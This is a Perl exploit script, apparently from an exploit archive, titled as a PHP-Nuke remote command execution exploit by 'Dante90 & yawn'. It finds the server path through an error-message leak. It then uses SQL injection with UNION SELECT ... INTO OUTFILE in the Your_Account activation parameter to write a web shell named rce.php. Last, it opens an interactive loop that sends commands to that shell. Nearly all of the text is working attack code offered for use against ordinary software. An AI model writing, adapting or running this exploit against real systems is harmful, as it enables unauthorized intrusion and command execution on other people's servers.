# PHP-Nuke <= Remote Command Execution Exploit # Author/s: Dante90 & yawn # Contact Us: www.unitx.net # Requirements: magic_quotes_gpc : off # Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net # You will remember, Watson, how the dreadful business of the # Abernetty family was first brought to my notice by the depth which the # parsley had sunk into the butter upon a hot day. # -- Sherlock Holmes use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; sub Nuke::Usage { print " \n [0-Day] PHP-Nuke <= Remote Command Execution Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\ *\n"; print " * perl name_exploit.pl [host] [username] [password] *\n"; print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90 & yawn *\n"; print " * www.unitx.net *\n"; print " ------------------------------------------------------ \n"; } #VARS system $^O eq 'MSWin32' ? 'cls' : 'clear'; Nuke::Usage(); my $host = shift || die; my $cmd; my $shell = ""; # Change Here to Set your custom shell (for example use system() ); my $cookies = HTTP::Cookies->new; my $request = LWP::UserAgent->new; $request->agent("Mozilla 5/0"); $request->cookie_jar($cookies); #END VARS sub Full_Path_Disclosure() { my $Get = $request->get($host.'themes/NukeNews/theme.php'); if ($Get->content =~ /No such file or directory in (.+?)<\/b> on line/i) { return $1; } else { return "failed"; } } print " * Getting Full Path\n"; my $path = Full_Path_Disclosure(); die " * Failed Path Extraction" if ($path eq "failed"); $path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g; print " * Full Path Found: $path\n"; if ($path =~ m/\\/) { $path =~ s/\\/\\\\\\\\/g; } print " * Injecting Shell To $host\n"; my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF", { check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php", }, Referer => $host."index.php"); print " * Injecting Successfully Completed\n"; print " * Shell now available on $host"."rce.php\n"; print " * Connecting to remote shell\n"; sleep(4); print " * Connected.. Type \"quit\" to quit\n"; while() { print "* root\@backdoor ~\$ "; $cmd = <>; chomp($cmd); last if $cmd eq "quit"; $req2 = $request->get($host."/rce.php?cmd=".$cmd); print $req2->content."\n"; }